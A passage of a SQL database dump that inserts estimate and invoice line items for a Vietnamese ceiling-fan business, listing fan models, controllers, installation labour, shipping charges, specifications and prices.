(290, 101, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Sải cánh 152cm<br />\r\nĐộng cơ DC, BLDC công suất 38W<br />\r\nChất liệu cánh: Gỗ tự nhiên (Màu Darl Walnut)<br />\r\nMàu sắc thân quạt: Black<br />\r\nĐiều khiển từ xa 5 cấp đi kèm', 1.00, 8600000.00, '', 1, 0, NULL, 0.00),
(291, 102, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK - 52YFT-7063A', 'Sải cánh 132cm<br />\r\nĐộng cơ DC<br />\r\nĐiều khiển từ xa đi kèm', 1.00, 5400000.00, '', 1, 0, NULL, 0.00),
(292, 59, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC ', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(293, 59, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 2, 0, NULL, 0.00),
(294, 103, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(295, 103, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 2, 0, NULL, 0.00),
(296, 60, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC ', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(297, 104, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(298, 61, 'estimate', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 9.00, 250000.00, '', 1, 0, NULL, 0.00),
(299, 105, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 9.00, 250000.00, '', 1, 0, NULL, 0.00),
(300, 62, 'estimate', 'Haiku 60 inch Caramel Bamboo', 'Sải cánh: 152cm <br />\r\nĐộng cơ EC motor, công suất max/min : 2.5/29,3Watts<br />\r\nChất liệu màu cánh: Tre 5 lớp (Caramel Bamboo)<br />\r\nChất liệu màu thân quạt: Đen (Matt Black) - Aluminium<br />\r\nĐiều khiển APP, remote từ xa<br />\r\nTích hợp sẳn cảm biến SenseMe, cảm biến nhiệt/ độ ẩm, cảm biến chuyển động hồng ngoại<br />\r\nChức năng: Sleep, Timer, Whoosh, and Fan Eco special operational modes<br />\r\nBảo hành: 3 năm <br />\r\nThương hiệu/xuất xứ: Big Ass Fans /USA<br />\r\nBộ cánh sản xuất tại USA', 1.00, 39600000.00, '', 1, 0, NULL, 0.00),
(301, 62, 'estimate', 'Nhân công lắp đặt trần tấm thạch cao, vận chuyển miễn phí', '- Địa chỉ lắp đặt tại Hà Nội', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(302, 106, 'invoice', 'Haiku 60 inch Caramel Bamboo', 'Sải cánh: 152cm <br />\r\nĐộng cơ EC motor, công suất max/min : 2.5/29,3Watts<br />\r\nChất liệu màu cánh: Tre 5 lớp (Caramel Bamboo)<br />\r\nChất liệu màu thân quạt: Đen (Matt Black) - Aluminium<br />\r\nĐiều khiển APP, remote từ xa<br />\r\nTích hợp sẳn cảm biến SenseMe, cảm biến nhiệt/ độ ẩm, cảm biến chuyển động hồng ngoại<br />\r\nBảo hành: 3 năm <br />\r\nThương hiệu/xuất xứ: Big Ass Fans /USA<br />\r\nBộ cánh sản xuất tại USA', 1.00, 39600000.00, '', 1, 0, NULL, 0.00),
(303, 106, 'invoice', 'Nhân công lắp đặt trần tấm thạch cao, vận chuyển miễn phí', '- Địa chỉ lắp đặt tại Hà Nội', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(304, 62, 'estimate', 'Bộ đèn LED quạt trần Haiku', 'Đèn LED viền trắng theo quạt <br />\r\nCông suất: 16.3 W<br />\r\nNominal Lumen Output: 1280 Lm<br />\r\nDimming Range: 3-100% (16 settings)', 1.00, 7300000.00, '', 3, 0, NULL, 0.00),
(305, 106, 'invoice', 'Bộ đèn LED quạt trần Haiku', 'Đèn LED viền trắng theo quạt <br />\r\nCông suất: 16.3 W<br />\r\nNominal Lumen Output: 1280 Lm<br />\r\nDimming Range: 3-100% (16 settings)', 1.00, 7300000.00, '', 3, 0, NULL, 0.00),
(308, 63, 'estimate', 'Thay PIN điều khiển', 'Thay PIN mới cho điều khiển quạt - loại 6 tốc độ', 3.00, 50000.00, 'cái', 1, 0, NULL, 0.00),
(309, 107, 'invoice', 'Thay PIN điều khiển', 'Thay PIN mới cho điều khiển quạt - loại 6 tốc độ', 3.00, 50000.00, 'cái', 1, 0, NULL, 0.00),
(310, 64, 'estimate', 'Haiku L 44 inch White', 'Sải cánh: 112cm <br />\r\nMàu Trắng<br />\r\nĐộng cơ EC motor, <br />\r\nBộ đèn LED 2700K<br />\r\nĐiều khiển tặng kèm', 1.00, 18000000.00, '', 1, 0, NULL, 0.00),
(311, 64, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Miễn Phí trần tấm thạch cao', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(312, 108, 'invoice', 'Haiku L 44 inch White', 'Sải cánh: 112cm <br />\r\nMàu Trắng<br />\r\nĐộng cơ EC motor, <br />\r\nBộ đèn LED 2700K<br />\r\nĐiều khiển tặng kèm', 1.00, 18000000.00, '', 1, 0, NULL, 0.00),
(313, 108, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Miễn Phí trần tấm thạch cao', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(314, 65, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nTra dầu mỡ, kiểm tra ốc vít, sửa chữa quạt bị phát tiếng kêu', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(315, 109, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nTra dầu mỡ, kiểm tra ốc vít, sửa chữa quạt bị phát tiếng kêu', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(316, 66, 'estimate', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(317, 67, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(318, 110, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(319, 68, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(320, 74, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(321, 111, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(322, 112, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí cân chỉnh vị trí quạt Aroma', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(323, 69, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC ', 1.00, 300000.00, '1', 1, 0, NULL, 0.00),
(324, 113, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 300000.00, '1', 1, 0, NULL, 0.00),
(325, 70, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(326, 114, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(327, 115, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', 'Sải cánh 132cm<br />\r\nĐộng cơ DC, 35W<br />\r\nCánh gỗ nguyên khối, màu Dark Walnut<br />\r\nMàu thân: Matt Black<br />\r\nĐiều khiển DC 5 cấp kèm theo', 1.00, 4625000.00, '', 1, 0, NULL, 0.00),
(328, 115, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Bao gồm lắp đặt gia cố móc treo', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(329, 71, 'estimate', 'Quạt trần SINO LED 52 Black Dark Wood', '', 2.00, 6600000.00, '', 1, 0, NULL, 0.00),
(330, 116, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 2.00, 6600000.00, '', 1, 0, NULL, 0.00),
(331, 72, 'estimate', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(332, 72, 'estimate', 'Nhân công lắp đặt trần thạch cao (đã bao gồm)', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(333, 73, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển DC<br />\r\nCông suất motor: 35-36W<br />\r\nBao gồm Receiver + Remote Control', 2.00, 750000.00, '', 1, 0, NULL, 0.00),
(334, 117, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển DC<br />\r\nCông suất motor: 35-36W<br />\r\nBao gồm Receiver + Remote Control', 3.00, 750000.00, '', 1, 0, NULL, 0.00),
(335, 74, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(336, 74, 'estimate', 'Quạt trần Hamachi LED 5 cánh nhựa màu Vân Gỗ KOA. ', '', 1.00, 5800000.00, '', 2, 0, NULL, 0.00),
(337, 74, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí gia cố móc treo 500k/bộ', 2.00, 0.00, '', 3, 0, NULL, 0.00),
(338, 75, 'estimate', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W', 'Sải cánh 1320mm <br />\r\nĐộng cơ DC, 35W<br />\r\nMàu sắc: Trắng<br />\r\nĐèn LED : ánh sáng ấm 2700K<br />\r\nBộ điều khiển tặng kèm 6 tốc độ', 3.00, 5800000.00, '', 1, 0, NULL, 0.00),
(339, 76, 'estimate', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(340, 118, 'invoice', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(342, 77, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Màu gỗ tối', 1.00, 6800000.00, '', 1, 0, NULL, 0.00),
(343, 119, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Màu gỗ tối', 1.00, 6800000.00, '', 1, 0, NULL, 0.00),
(344, 78, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Màu gỗ sáng', 2.00, 8800000.00, '', 1, 0, NULL, 0.00),
(345, 120, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Màu gỗ sáng', 2.00, 8800000.00, '', 1, 0, NULL, 0.00),
(346, 121, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Màu gỗ sáng', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(347, 122, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'màu gỗ sáng', 1.00, 5720000.00, '', 1, 0, NULL, 0.00),
(348, 122, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(349, 123, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(351, 123, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(352, 124, 'invoice', 'Haiku I 52 inch White with SenseME', 'MODEL: Haiku I Series Indoor 52 inch<br />\r\n<br />\r\nDiameter: 52 inch (K3127-SO) Đường kính cánh: 1300mm Airfoil Finishes Color: Matrix composite White Màu sác cánh: Matrix composite - nhựa tổng hợp chất liệu composite màu Trắng Hardware Finishe Color: White Màu sác thân: White Motor : High-efficiency, brushless DC/EC motor Động cơ: tiêu chuẩn tiết kiệm điện, DC/EC Environment: Indoor (trong nhà) Môi trường sử dụng: Trong Nhà Accessories: Remote Control 7 speed Bộ điều khiển từ xa 7 tốc độ đi kèm gắn tường/cầm tay Mount: Low profile Móc treo cố định dành cho trần nhà thấp &lt; 2,8m Weight: 5.9 kg Trọng lượng: 5.9 kg Max Speed: 177 RPM Tốc độ quay tối đa: 177 RPM Watts Min/ Max: 2.4/23.9 W Công suất động cơ Min/Max: 2.4/23.9 W Operating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz Nguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz Ambient Operational Temperature: 0° to 40° C Nhiệt độ hoạt động: 0° đến 40° C Sound Level: &lt;35dBa Độ ồn quay ở tốc độ cao: &lt;35dBa Brandneme/Original: Haiku of Big Ass Fans/USA Thương hiệu/xuất xứ: Haiku', 1.00, 36900000.00, '', 1, 0, NULL, 0.00),
(353, 124, 'invoice', 'Haiku L 44 inch White', 'MODEL: Haiku L Series Indoor 44 inch with LED Kits + Module WiFi<br />\r\n<br />\r\nDiameter: 44 in. (112 cm) Đường kính cánh: 112 cm Airfoil Finishes Color: Hybrid resin Màu sắc cánh: Hybrid resin - Màu Trắng Hardware Finishe Color: White Màu sác thân: White Motor : High-efficiency, brushless DC/EC motor Động cơ: tiêu chuẩn tiết kiệm điện, DC/EC Environment: Indoor (trong nhà) Môi trường sử dụng: Trong Nhà Accessories: Remote Control 7 speed Bộ điều khiển từ xa 7 tốc độ đi kèm gắn tường/cầm tay Mount: Universal Móc treo nối dài dành cho trần cao. Liên hệ tư vấn Weight: 5.4 kg Trọng lượng: 5.4 kg Light Kits: 2700 K, CRI: 90 bộ đèn LED ánh sáng vàng Dimmable 16 level Max Speed: 177 RPM Tốc độ quay tối đa: 177 RPM Watts Max: 19.3 W Công suất động cơ Max: 19.3 W Operating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz Nguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz Ambient Operational Temperature: 0° to 40° C Nhiệt độ hoạt động: 0° đến 40° C Sound Level: &lt;35dBa Độ ồn quay ở tốc độ cao: &lt;35dBa Brandneme/Original: Haiku of Big Ass Fans/USA Thương hiệu/xuất xứ: Haiku Module WiFi - điều khiển qua APP, Voice đi kèm', 2.00, 24500000.00, '', 2, 0, NULL, 0.00),
(355, 79, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Sải cánh 152cm<br />\r\nMàu cánh gỗ : Timber Wood<br />\r\nMàu thân quạt: Brushed Nickel<br />\r\nĐộng cơ DC tiết kiệm điện', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(356, 79, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Giá lắp đặt trọn gói - 500K/lần', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(357, 80, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(358, 80, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(359, 125, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(360, 125, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(361, 126, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC ', 2.00, 300000.00, '1', 1, 0, NULL, 0.00),
(362, 127, 'invoice', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W (màu trắng)', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(363, 127, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(364, 128, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 2.00, 5230000.00, '', 1, 0, NULL, 0.00),
(365, 81, 'estimate', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(366, 81, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí đi lại - sửa chữa tháo lắp Bộ remote', 1.00, 150000.00, 'cái', 2, 0, NULL, 0.00),
(367, 129, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Bán lẻ Remote DC', 1.00, 300000.00, '', 1, 0, NULL, 0.00),
(369, 82, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí đi lại sửa chữa bộ remote quạt<br />\r\n', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(370, 82, 'estimate', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 2, 0, NULL, 0.00),
(371, 130, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí đi lại sửa chữa bộ remote quạt', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(372, 130, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 2, 0, NULL, 0.00);
INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(373, 131, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 152cm <br />\r\nMàu sắc thân quạt: Trắng<br />\r\nMàu cánh: Gỗ tự nhiên màu sáng<br />\r\nĐộng cơ : 38W, BLDC tiết kiệm điện DC motor<br />\r\nĐiều khiển 5 tốc độ kèm theo<br />\r\n', 1.00, 4964000.00, '', 1, 0, NULL, 0.00),
(374, 131, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí nhân công lắp đặt và chi phí vận chuyển từ HCM đi HN', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(375, 132, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(376, 132, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(377, 133, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(378, 133, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(379, 134, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(380, 83, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(381, 83, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Giá lắp đặt trọn gói - giao hàng lắp đặt tại Vũng Tàu (chưa bao gồm cấp nguồn điện)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(382, 135, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(383, 135, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Giá lắp đặt trọn gói - giao hàng lắp đặt tại Vũng Tàu (chưa bao gồm cấp nguồn điện)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(384, 136, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 2.00, 6600000.00, '', 1, 0, NULL, 0.00),
(385, 137, 'invoice', 'Quạt trần thấp AROMA 52 BN Maple Wood', '', 1.00, 4875000.00, '', 1, 0, NULL, 0.00),
(386, 138, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 13.00, 250000.00, '', 1, 0, NULL, 0.00),
(387, 84, 'estimate', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19300000.00, '', 1, 0, NULL, 0.00),
(388, 139, 'invoice', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19300000.00, '', 1, 0, NULL, 0.00),
(389, 140, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 5m', '', 4.00, 128490000.00, '', 1, 0, NULL, 0.00),
(390, 140, 'invoice', 'Quạt gắn tường công nghiệp AirEye', '', 1.00, 45360000.00, '', 2, 0, NULL, 0.00),
(391, 140, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', '', 1.00, 5500000.00, 'lots', 3, 0, NULL, 0.00),
(392, 141, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 8.00, 5230000.00, '', 1, 0, NULL, 0.00),
(393, 141, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', 'Chi phí vận chuyển giao hàng từ HCM đến Hồ Tràm', 1.00, 850000.00, 'lots', 2, 0, NULL, 0.00),
(394, 142, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 3.00, 5230000.00, '', 1, 0, NULL, 0.00),
(395, 142, 'invoice', 'Quạt trần cao cấp IRIS 60 Black ABS', '', 11.00, 12030000.00, '', 2, 0, NULL, 0.00),
(396, 142, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', 'Chi phí vận chuyển giao hàng từ HCM - Hồ Tràm', 1.00, 1500000.00, 'lots', 3, 0, NULL, 0.00),
(397, 143, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 9.00, 5300000.00, '', 1, 0, NULL, 0.00),
(398, 143, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', 'Chi phí vận chuyển từ HCM- Hồ Tràm', 1.00, 1500000.00, 'lots', 2, 0, NULL, 0.00),
(399, 144, 'invoice', 'Haiku 60 inch White Aluminium', '', 3.00, 77798160.00, '', 1, 0, NULL, 0.00),
(400, 144, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', '', 1.00, 37500000.00, 'lots', 2, 0, NULL, 0.00),
(401, 145, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '', 3.00, 131640000.00, '', 1, 0, NULL, 0.00),
(402, 145, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', 'Chi phí vận chuyển đến công trình Tiên du- Bắc Ninh', 1.00, 5500000.00, 'lots', 2, 0, NULL, 0.00),
(403, 146, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '', 2.00, 120000000.00, '', 1, 0, NULL, 0.00),
(404, 146, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Bao gồm chi phí phát sinh nhân công lắp đặt', 1.00, 23950000.00, '', 2, 0, NULL, 0.00),
(405, 147, 'invoice', 'Haiku Outdoor Cocoa Aluminum', '84inch', 1.00, 80600000.00, '', 1, 0, NULL, 0.00),
(406, 148, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 2.00, 3900000.00, '', 1, 0, NULL, 0.00),
(407, 148, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', 'Chi phí vận chuyển từ HCM - Bình Thuận', 1.00, 500000.00, 'lots', 2, 0, NULL, 0.00),
(408, 149, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 2.00, 5450000.00, '', 1, 0, NULL, 0.00),
(409, 150, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 BN Maple Wood', '', 3.00, 3680000.00, '', 1, 0, NULL, 0.00),
(410, 151, 'invoice', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', 'matt white', 6.00, 4725000.00, '', 1, 0, NULL, 0.00),
